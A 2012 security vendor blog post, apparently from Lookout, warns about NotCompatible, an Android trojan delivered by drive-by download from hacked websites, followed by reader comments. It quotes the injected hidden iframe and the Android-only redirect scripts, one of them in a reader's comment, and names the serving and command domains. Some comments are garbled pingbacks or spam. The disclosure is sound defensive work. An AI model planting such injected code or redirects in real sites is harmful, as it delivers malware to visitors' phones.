May 2, 2012

UPDATE: Security Alert: Hacked Websites Serve Suspicious Android Apps (NotCompatible)

Update Two: Based on our current research,  NotCompatible is a new Android trojan that appears to serve as a simple TCP relay / proxy while posing as a system update. This threat does not currently appear to cause any direct harm to a target device, but could potentially be used to gain illicit access to private networks by turning an infected Android device into a proxy. As previously mentioned, this appears to be the first time that compromised websites have been used to distribute malware targeting Android devices.

Distribution of NotCompatible depends on compromised websites that have a hidden iframe at the bottom of each page. If a user visits a compromised website from an Android device, their mobile web browser will automatically begin downloading the NotCompatible application, named ‘Update.apk’. Like any drive-by downloads, a user needs to install the downloaded application before a device will be infected. Based on our initial investigation, we’ve confirmed that a number of websites have been compromised. However, affected sites appear to show relatively low traffic and we expect total impact to Android users to be low.

This specific sample, while relatively well constructed, does not appear to go to great lengths to hide its intended purpose: it can be used to access private networks. This feature in itself could be significant for system IT administrators: a device infected with NotCompatible could potentially be used to gain access to normally protected information or systems, such as those maintained by enterprise or government.

Update: All Lookout users are currently protected against NotCompatible.  Lookout protects users from drive-by downloads when the features File System Monitoring and Install Monitoring are active.  These additional layers of protection alert users to known threats when they are downloaded to device storage, such as the /Downloads folder on the SD Card, and immediately before they are installed via sideloading.

Hacked websites are frequently used to infect PCs with malware; however, today we have identified the first time hacked websites are being used to specifically target mobile devices.  Lookout is in the process of rolling out an update to protect against the new threat,  NotCompatible.

How it Works

In this specific attack, if a user visits a compromised website from an Android device, their web browser will automatically begin downloading an application—this process is commonly referred to as a drive by download.

When the suspicious application finishes downloading, the device will display a notification prompting the user to click on the notification to install the downloaded app.  In order to actually install the app to a device, it must have the “Unknown sources” setting enabled (this feature is commonly referred to as “sideloading”).  If the device does not have the unknown sources setting enabled, the installation will be blocked.

(Screenshots originally posted by redditor, Georgiabiker)

Technical details

Infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>

We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.

When a PC-based web browser accesses the site at gaoanalitics.info, a not found error is returned; however, if a web browser with the word “Android” in its user-agent header accesses the page, the following is returned:

<html><head></head><body><script  type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>

This page causes the browser to immediately attempt to access the page at androidonlinefix.info.  Like the previous site, only browsers sending an Android User-agent string will trigger a download (all other browsers will show a blank page).  When visiting this page from an Android browser, the server returns an android application, causing an Android browser to automatically download it.

Suspicious applications are currently served from the following sites:

  • gaoanalitics.info
  • androidonlinefix.info

Command and Control (C&C) domains include:

  • notcompatibleapp.eu

We’re still in the process of assessing the full extent of infected sites; however, there are early indications that the number of affected sites could be numerous.  As Lookout identifies the extent of infected websites, we will update this blog post.

The Lookout security team is actively investigating the infected websites and suspicious application.  Refer back to this blog post for regular updates on this security alert.

18 comments
  1. Leonidas says:

    thanks for the warning, will be alert

  2. [...] websites portion adult a really initial Android drive-by malware.Lookout Security reports that the organisation has identified several sites that are portion adult malware privately targeting a A…. This means anyone with an defenceless Android device will start to download a NotCompatible [...]

  3. [...] Mobile Security on Wednesday reported that the new Trojan, dubbed “NotCompatible,” which postures as a system update could potentially be used to gain [...]

  4. Rippidip says:

    Does this affect all browsers on Android (Dolphin, Firefox, Chrome, “Robot” etc.) or just the stock browser?

  5. [...] by security company Lookout Mobile Security on a number of webistes, the decidedly odd “NotCompatible” Trojan is distributed using a web page containing a hidden [...]

  6. [...] by confidence association Lookout Mobile Security on a series of webistes, a decidedly peculiar “NotCompatible” Trojan is distributed regulating a web page containing a dark [...]

  7. [...] by security company Lookout Mobile Security on a series of webistes, a decidedly peculiar “NotCompatible” Trojan is distributed regulating a web page containing a dark [...]

  8. [...] by confidence association Lookout Mobile Security on a series of webistes, a decidedly peculiar “NotCompatible” Trojan is distributed regulating a web page containing a dark [...]

  9. [...] by security company Lookout Mobile Security on a number of webistes, the decidedly odd “NotCompatible” Trojan is distributed using a web page containing a hidden [...]

  10. jhon says:

    Security is most important issue in mobile for using internet service.Android has upload a security service,of course it is essential for safety purpose.Thank for service.

  11. [...] Lookout first published information about the new malware, dubbed “NotCompatible,” on Wednesday. Further analysis, however, has revealed the most likely reason why cyber criminals are spreading the malware. [...]

  12. [...] infectado en un Proxy”, tal y como explica la compañía especialista en seguridad móvil en su blog. Lo que puede ser especialmente perjudicial de alcanzar redes [...]

  13. [...] Lookout says the number of affected sites is low at present, so there’s no need to panic just yet, but it’s certainly far from comforting to learn just how devious those behind the malware are becoming. With fake Instagram and Angry Birds Space apps also in the wild, Android users will need to remain vigilant in order to keep their device free of malicious exploits. [...]

  14. [...] Second CausesThe Pirate Bay To Go DownMexico: Former ruling party back in powerLookout Mobile  detected websites aimed at mobile devices to distribute [...]

  15. Wim Rijksen says:

    I got a mail with no subject today, addressed to a bunch of people, containing only a URL: http://www.adheijnehengelo.nl/wp-content/plugins/zaeuxuoueen/biokrls.html?aba=shxaps
    Opening this on my Android device, it downloaded update.apk, which I did not install.
    The document (biokrls.html) contained this:

    if(navigator.userAgent.toLowerCase().indexOf(“android”) > -1) { top.location = ‘http://194.60.242.54/goo/’; }

    You are here because one of your friends have invited you.
    Page loading, please wait….

  16. @Wim, thanks for the report!

  17. Howdy! Do you know if they make any plugins to help with Search Engine Optimization?
    I’m trying to get my blog to rank for some targeted keywords
    but I’m not seeing very good gains. If you know of any please
    share. Cheers!

    my web blog: fb ads cracked reloaded

Leave a comment